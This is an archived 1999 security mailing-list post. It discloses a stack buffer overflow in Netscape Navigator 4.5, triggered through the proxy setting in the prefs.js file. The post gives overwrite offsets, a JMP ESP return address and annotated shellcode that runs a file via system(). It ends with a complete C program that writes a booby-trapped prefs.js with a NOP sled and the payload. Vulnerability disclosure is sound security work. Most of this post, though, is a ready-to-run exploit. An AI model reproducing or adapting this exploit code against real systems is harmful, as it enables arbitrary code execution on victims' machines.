OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
NTBugtraq And NTSecurity Archives: Netscape Navigator/Communica

Netscape Navigator/Communicator 4.5 buffer overflow

Subject: Netscape Navigator/Communicator 4.5 buffer overflow
From: darkplan (darkplanOCEANFREE.NET)
Date: Wed Dec 22 1999 - 05:28:42 CST

Netscape Navigator/Communicator 4.5 buffer overflow advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: Steve Fewer, darkplanoceanfree.net
                     http://indigo.ie/~lmf
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Introduction:

I recently uncovered a stack based buffer overflow in NN
which allowed me to execute arbitrary code. It is a local
Attack where the offending party is the users 'prefs.js'
file, usually stored in c:\program files\netscape\users\***
where *** is a user. It occurs when NN reads in an entry
greater than 80 bytes in the network.proxy.http field.
Netscape have been notified of this problem.

E.g.

user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
CCCC");

The EBP is overrun at bytes 81 - 84 and the EIP is overrun
at bytes 85 - 89, from there on your code can be placed.

The first 80 bytes get blown away when you smash the stack
but you are left with a possible 500 bytes or more for your
exploit code, (500 was the most I checked). You're first byte
of code is pointed to by the ESP.

To concoct an exploit for this to see if it was actually
exploitable I pointed my EIP into a 'JMP ESP' located at
7FD035EB in shell32.dll (v4.72.3110.6) which NN loads.
Having got back to my exploit buffer I simply made it
execute a file called app.exe, which should be located in
\windows\command\ and then made it call exit() to tidy up
so we don't cause an access violation, obviously there is
room for a more insidious exploit but I don't view this as
an enormously dangerous security flaw so it didn't warrant
writing anything more sophisticated.

For protection you could try the latest version of NN which
is 4.7.

This was all created/tested on Windows98 running on an Intel
PII400 with 128MB RAM.

The Shell Code:

This is the assembly which runs a file app.exe and then
calls exit() to clean up. The op codes are to the right.
I called system() at address 78019824 in msvcrt.dll
v6.00.8397.0 to run app.exe and exit() at address 78005504
in the same DLL to tidy up.

    mov esp,ebp // 8BE5
    push ebp // 55
    mov ebp,esp // 8BEC
    xor edi,edi // 33FF
    push edi // 57
    sub esp,04h // 83EC04
    mov byte ptr [ebp-08h],61h // C645F861
    mov byte ptr [ebp-07h],70h // C645F970
    mov byte ptr [ebp-06h],70h // C645FA70
    mov byte ptr [ebp-05h],2Eh // C645FB2E
    mov byte ptr [ebp-04h],65h // C645FC65
    mov byte ptr [ebp-03h],78h // C645FD78
    mov byte ptr [ebp-02h],65h // C645FE65
    mov eax, 0x78019824 // B824980178
    push eax // 50
    lea eax,[ebp-08h] // 8D45F8
    push eax // 50
    call dword ptr[ebp-0ch] // FF55F4
    push ebp // 55
    mov ebp,esp // 8BEC
    mov edx,0xFFFFFFFF // BAFFFFFFFF
    sub edx,0x87FFAAFB // 81EAFBAAFF87
    push edx // 52
    xor eax,eax // 33C0
    push eax // 50
    call dword ptr[ebp-04h] // FF55FC

The Exploit:

<-snip->

/* Stack based buffer overflow exploit for Netscape Navigator 4.5
 * Author Steve Fewer, 22-12-99. Mail me at darkplanoceanfree.net
 *
 * Netscape Navigator causes a buffer overflow when reading from
 * the users "prefs.js" file. If it reads a string longer than 80
 * bytes in the user_pref("network.proxy.http", "proxy.com");
 * field it smashes the stack overwrighting the EIP and EBP. This
 * can be used to execute arbitrary code.
 *
 * Tested with Netscape Navigator 4.5 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

#include <stdio.h>
#include <string.h>

int main()
{

    printf("\n\n\t\t........................................\n");
    printf("\t\t.....Netscape Navigator 4.5 exploit.....\n");
    printf("\t\t........................................\n");
    printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n");
    printf("\t\t.........http://indigo.ie/~lmf..........\n");
    printf("\t\t........................................\n\n");

    // the first 80 bytes. These get blown away when the stack goes down.
    char buff[96];
    // the EBP, we don't need to use it so fill it with B's
    char ebp[8] = "BBBB";
    // we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP 7FD035EB
    char eip[8] = "\xEB\x35\xD0\x7F";
    // the is our 'arbitrary code', it just runs a file app.exe from the \WINDOWS\COMMAND directory then calls exit() to clean up
    char sploit[128] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
    FILE *file;
        for(int i=0;i<80;i++)
        {
        buff[i] = 0x90;
        }
    // just create our new, 'trojand' prefs.js file
    file = fopen("prefs.js","wb");
    // and slap in the the nasty sploit
    fprintf(file,"user_pref(\"network.proxy.http\", \"%s%s%s%s\");", buff, ebp, eip, sploit);

    printf("\t created file prefs.js loaded with the exploit.\n");

return 0;
}

<-snip->

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This archive was generated by hypermail 2b27 : Fri Dec 24 1999 - 10:59:10 CST